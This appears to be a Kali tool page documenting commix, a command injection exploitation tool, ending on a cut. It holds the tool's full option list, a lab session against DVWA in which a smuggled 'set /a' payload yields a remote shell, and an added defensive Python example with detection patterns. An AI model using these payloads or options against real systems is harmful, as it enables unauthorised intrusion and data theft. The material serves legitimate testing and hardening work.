commix Package Description

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and can be used by web developers, penetration testers, or security researchers to test web applications for bugs, errors, or vulnerabilities related to command injection attacks. With this tool it is easy to find and exploit a command injection vulnerability in a given vulnerable parameter or string. Commix is written in Python.

Source: https://github.com/stasinopoulos/commix


Author: Anastasios Stasinopoulos

License: GPLv3

Tools included in the commix package

commix – Automated All-in-One OS Command Injection and Exploitation Tool

root@kali:~# commix -h

Usage: commix [option(s)]

Options:
  -h, --help            Show help and exit.

  General:
    These options relate to general matters.

    -v VERBOSE          Verbosity level (0-4, Default: 0).
    --version           Show version number and exit.
    --output-dir=OUT..  Set custom output directory path.
    -s SESSION_FILE     Load session from a stored (.sqlite) file.
    --flush-session     Flush session files for current target.
    --ignore-session    Ignore results stored in session file.
    -t TRAFFIC_FILE     Log all HTTP traffic into a textual file.
    --batch             Never ask for user input, use the default behaviour.
    --encoding=ENCOD..  Force character encoding used for data retrieval (e.g.
                        GBK).
    --charset=CHARSET   Time-related injection charset (e.g.
                        "0123456789abcdef")
    --check-internet    Check internet connection before assessing the target.

  Target:
    This options has to be provided, to define the target URL.

    -u URL, --url=URL   Target URL.
    --url-reload        Reload target URL after command execution.
    -l LOGFILE          Parse target from HTTP proxy log file.
    -m BULKFILE         Scan multiple targets given in a textual file.
    -r REQUESTFILE      Load HTTP request from a file.
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL (1-2,
                        Default: 0).
    -x SITEMAP_URL      Parse target(s) from remote sitemap(.xml) file.

  Request:
    These options can be used to specify how to connect to the target URL.

    -d DATA, --data=..  Data string to be sent through POST.
    --host=HOST         HTTP Host header.
    --referer=REFERER   HTTP Referer header.
    --user-agent=AGENT  HTTP User-Agent header.
    --random-agent      Use a randomly selected HTTP User-Agent header.
    --param-del=PDEL    Set character for splitting parameter values.
    --cookie=COOKIE     HTTP Cookie header.
    --cookie-del=CDEL   Set character for splitting cookie values.
    -H HEADER, --hea..  Extra header (e.g. 'X-Forwarded-For: 127.0.0.1').
    --headers=HEADERS   Extra headers (e.g. 'Accept-Language: fr
                        ETag: 123').
    --proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
    --tor               Use the Tor network.
    --tor-port=TOR_P..  Set Tor proxy port (Default: 8118).
    --tor-check         Check to see if Tor is used properly.
    --auth-url=AUTH_..  Login panel URL.
    --auth-data=AUTH..  Login parameters and data.
    --auth-type=AUTH..  HTTP authentication type (e.g. 'Basic' or 'Digest').
    --auth-cred=AUTH..  HTTP authentication credentials (e.g. 'admin:admin').
    --ignore-401        Ignore HTTP error 401 (Unauthorized).
    --force-ssl         Force usage of SSL/HTTPS.
    --ignore-redirects  Ignore redirection attempts.
    --retries=RETRIES   Retries when the connection timeouts (Default: 3).

  Enumeration:
    These options can be used to enumerate the target host.

    --all               Retrieve everything.
    --current-user      Retrieve current user name.
    --hostname          Retrieve current hostname.
    --is-root           Check if the current user have root privileges.
    --is-admin          Check if the current user have admin privileges.
    --sys-info          Retrieve system information.
    --users             Retrieve system users.
    --passwords         Retrieve system users password hashes.
    --privileges        Retrieve system users privileges.
    --ps-version        Retrieve PowerShell's version number.

  File access:
    These options can be used to access files on the target host.

    --file-read=FILE..  Read a file from the target host.
    --file-write=FIL..  Write to a file on the target host.
    --file-upload=FI..  Upload a file on the target host.
    --file-dest=FILE..  Host's absolute filepath to write and/or upload to.

  Modules:
    These options can be used increase the detection and/or injection
    capabilities.

    --icmp-exfil=IP_..  The 'ICMP exfiltration' injection module.
                        (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').
    --dns-server=DNS..  The 'DNS exfiltration' injection module.
                        (Domain name used for DNS exfiltration attack).
    --shellshock        The 'shellshock' injection module.

  Injection:
    These options can be used to specify which parameters to inject and to
    provide custom injection payloads.

    -p TEST_PARAMETER   Testable parameter(s).
    --skip=SKIP_PARA..  Skip testing for given parameter(s).
    --suffix=SUFFIX     Injection payload suffix string.
    --prefix=PREFIX     Injection payload prefix string.
    --technique=TECH    Specify injection technique(s) to use.
    --skip-technique..  Specify injection technique(s) to skip.
    --maxlen=MAXLEN     Set the max length of output for time-related
                        injection techniques (Default: 10000 chars).
    --delay=DELAY       Seconds to delay between each HTTP request.
    --time-sec=TIMESEC  Seconds to delay the OS response (Default 1).
    --tmp-path=TMP_P..  Set the absolute path of web server's temp directory.
    --web-root=WEB_R..  Set the web server document root directory (e.g.
                        '/var/www').
    --alter-shell=AL..  Use an alternative os-shell (e.g. 'Python').
    --os-cmd=OS_CMD     Execute a single operating system command.
    --os=OS             Force back-end operating system (e.g. 'Windows' or
                        'Unix').
    --tamper=TAMPER     Use given script(s) for tampering injection data.
    --msf-path=MSF_P..  Set a local path where metasploit is installed.
    --backticks         Use backticks instead of "$()", for commands
                        substitution.

  Detection:
    These options can be used to customize the detection phase.

    --level=LEVEL       Level of tests to perform (1-3, Default: 1).
    --skip-calc         Skip the mathematic calculation during the detection
                        phase.
    --skip-empty        Skip testing the parameter(s) with empty value(s).
    --failed-tries=F..  Set a number of failed injection tries, in file-based
                        technique.

  Miscellaneous:
    --dependencies      Check for third-party (non-core) dependencies.
    --list-tampers      Display list of available tamper scripts
    --purge             Safely remove all content from commix data directory.
    --skip-waf          Skip heuristic detection of WAF/IPS/IDS protection.
    --mobile            Imitate smartphone through HTTP User-Agent header.
    --offline           Work in offline mode.
    --wizard            Simple wizard interface for beginner users.
    --disable-coloring  Disable console output coloring.

Commix Usage Example

root@kali:~# commix --url http://192.168.20.12/dvwa/vulnerabilities/exec/ \
> --cookie='PHPSESSID=cj645co26lgve7ro1kc9dvt3a0; security=low' \
> --data='ip=INJECT_HERE&Submit=Submit'

[commix ASCII-art banner] { v0.3b-nongit-20160104 }

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2015 Anastasios Stasinopoulos (@ancst)
+--

(*) Checking connection to the target URL... [ SUCCEED ]
(^) Warning: Heuristics have failed to identify server's operating system.
(?) Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > w
(*) Setting the (POST) 'ip' parameter for tests.
(^) Warning: Due to the relatively slow response of 'cmd.exe' there may be delays during the data extraction procedure.
(*) Testing the classic injection technique... [ SUCCEED ]
(!) The (POST) 'ip' parameter is vulnerable to Results-based Command Injection.
  (+) Type : Results-based Command Injection
  (+) Technique : Classic Injection Technique
  (+) Payload : %26 for /f "delims=" %i in ('cmd /c "set /a (49+1)"') do @set /p = AWMZVA%iAWMZVAAWMZVA <nul

(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > y

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > whoami

nt authority\iusr

commix(os_shell) >
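The session above shows why the DVWA exec page's 'ip' parameter was injectable: the value is spliced into a shell command, so the leading `&` (sent as `%26`) ends the ping command and the appended `set /a (49+1)` runs as a second one, returning the marker-wrapped result that commix looks for. The following Python is an added example, not code from commix, DVWA or this page: a constructed DVWA-style handler beside a hardened one that validates the parameter and never touches a shell, plus a small check that flags this arithmetic probe in constructed request-log lines. The log format, the `$((N+M))`/`expr` Unix probe forms and the handler itself are assumptions; nothing in the block executes a command, the builders only return what would have been run.

```python
"""Added example (not part of the commix project or of this Kali page).

The DVWA 'exec' page targeted in the session above builds a ping command
from the user-supplied 'ip' parameter. This shows why the '&' at the start
of commix's payload reaches cmd.exe when the parameter is spliced into a
shell string, what a hardened handler does instead (validate, then pass an
argv list with no shell), and how the arithmetic probe commix sends during
detection can be spotted in request logs. Nothing here runs a command: the
builders only return what would have been executed. The handler and the
log format are constructed, not DVWA's or commix's own code.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlencode

# The payload from the commix session above, with '%26' decoded to '&'
# (the form the application sees after URL decoding).
COMMIX_PROBE = ("& for /f \"delims=\" %i in ('cmd /c \"set /a (49+1)\"') "
                "do @set /p = AWMZVA%iAWMZVAAWMZVA <nul")


def build_ping_command_unsafe(ip):
    """Constructed DVWA-style handler: the raw parameter is concatenated
    into one string that would be handed to a shell (cmd.exe here, as in
    the session). The '&' separator survives, so the shell would run the
    appended 'for /f ... set /a (49+1)' as a second command and the
    marker-wrapped result '50' would land in the page output."""
    return "ping -n 3 " + ip


def is_valid_ip(value):
    """Allow-list check: the parameter must parse as an IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(value.strip())
    except ValueError:
        return False
    return True


def build_ping_command_safe(ip):
    """Hardened handler: validate against an allow-list and return an argv
    list. Passed to subprocess.run() without shell=True, an argv list is
    never parsed by a shell, so '&', ';', '|', '$()' or backticks cannot
    start a second command."""
    if not is_valid_ip(ip):
        raise ValueError("ip parameter is not an IP address")
    return ["ping", "-n", "3", str(ipaddress.ip_address(ip.strip()))]


# Detection: a shell separator or command substitution followed somewhere
# later by an arithmetic probe. 'set /a (N+M)' is the Windows form shown on
# the page; the '$((N+M))' and 'expr N + M' forms are an assumption about
# Unix-side probes and are not taken from the page.
SEPARATOR = r"(?:[;&|`\n]|\$\()"
ARITH = (r"(?:set\s*/a\s*\(\s*\d+\s*\+\s*\d+\s*\)"
         r"|\$\(\(\s*\d+\s*\+\s*\d+\s*\)\)"
         r"|\bexpr\s+\d+\s*\+\s*\d+)")
PROBE_RE = re.compile(SEPARATOR + r".*?" + ARITH, re.IGNORECASE | re.DOTALL)

# Constructed log format: '<client> "<METHOD> <path>" <status> body=<form-encoded>'
LOG_RE = re.compile(r'(\S+) "(\w+) (\S+)" (\d{3}) body=(\S*)$')


def find_injection_probes(log_lines):
    """Return (client, parameter) pairs whose decoded form value looks like
    a command-injection probe."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, _path, _status, body = m.groups()
        for name, values in parse_qs(body, keep_blank_values=True).items():
            for value in values:
                if PROBE_RE.search(value):
                    hits.append((client, name))
    return hits


# Constructed sample log: one benign request and one carrying the probe.
SAMPLE_LOG = [
    '192.168.20.5 "POST /dvwa/vulnerabilities/exec/" 200 body='
    + urlencode({"ip": "127.0.0.1", "Submit": "Submit"}),
    '192.168.20.7 "POST /dvwa/vulnerabilities/exec/" 200 body='
    + urlencode({"ip": COMMIX_PROBE, "Submit": "Submit"}),
]

if __name__ == "__main__":
    print("unsafe:", build_ping_command_unsafe(COMMIX_PROBE))
    print("safe  :", build_ping_command_safe("192.168.20.12"))
    try:
        build_ping_command_safe(COMMIX_PROBE)
    except ValueError as err:
        print("safe  : rejected probe:", err)
    print("log hits:", find_injection_probes(SAMPLE_LOG))
```

The allow-list check is the fix that matters; escaping individual metacharacters is fragile because cmd.exe and POSIX shells differ in which characters separate commands (the `--backticks` and `--os` options in the help above exist precisely because commix adapts its separators and substitution syntax to the back end). The log check is a cheap signal for the detection phase only; once a parameter is confirmed vulnerable the later requests carry arbitrary commands, so it belongs alongside, not instead of, the code fix.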

Attempt to exploit a site (--url="http://192.168.0.23/commix-testbed/scenarios/referer/referer(classic).php") using the highest testing level (--level=3):